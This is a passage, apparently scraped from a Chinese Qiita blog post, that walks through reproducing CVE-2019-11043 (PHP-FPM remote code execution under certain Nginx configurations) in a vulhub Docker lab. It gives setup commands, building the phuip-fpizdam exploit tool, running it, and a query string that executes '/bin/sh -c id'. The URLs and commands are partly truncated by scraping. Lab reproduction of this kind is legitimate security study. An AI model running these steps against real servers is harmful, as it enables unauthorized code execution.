cve-2019-11043 cve-2019-11043ノphp-fpm在nginx特定配置下远程代码执行 作者_W

1、CVE-2019-11043 漏洞复现CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行 作者：shimizukawasaki原文链接：/shimizukawasaki/items/39d68a7c658dfa50263d 收集整理：/test/index.php本文由 干货12Signushimizukawasakiposted at 2019-10-23漏洞复现CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行 php-fpm环境准备可以使用vulhub的环境 先在本

2、地创建一个名为 CVE-2019-11043 的文件夹,再创建一个名为 www 的文件夹在CVE-2019-11043 文件夹下执行如下命令 wget /vulhub/vulhub/master/php/CVE-2019-11043/default.confwget /vulhub/vulhub/master/php/CVE-2019-11043/docker-compose.yml在 CVE-2019-11043/www 文件夹下执行如下命令 wget https:

3、//vulhub/vulhub/master/php/CVE-2019-11043/www/index.php下载完成三个文件以后,在 CVE-2019-11043 文件夹下执行如下命令启动环境 service docker start docker-compose up -d随后访问 http:/ip:8080/index.php 即可 工具准备访问 /neex/phuip-fpizdam ,clone到本地以后,执行如下命令(将根据OS自动生成对 应的OS版本)go build即可生成 phuip-fpiz

4、dam 工具漏洞复现使用 ./phuip-fpizdam http:/ip:8080/index.php 攻击漏洞环境随后访问 http:/ip:8080/index.php?a=/bin/sh+-c%20%27id%27& 即可 3Reference/neex/phuip-fpizdam/vulhub/vulhub/tree/master/php/CVE-2019-11043Edit requestStockLike 04清水川崎 s h i m i z u k a w a s a k iFollow5Why not register and get more from Qiita?LoginSign upCommentsNo comments6Sign up for free and jointhis conversation.7How developers code is here.QiitaAbout Terms Privacy Guideline API 意見 Help AdvertisementIncrementsAbout 採用情報 BlogQiita Team Qiita Jobs Qiita Zi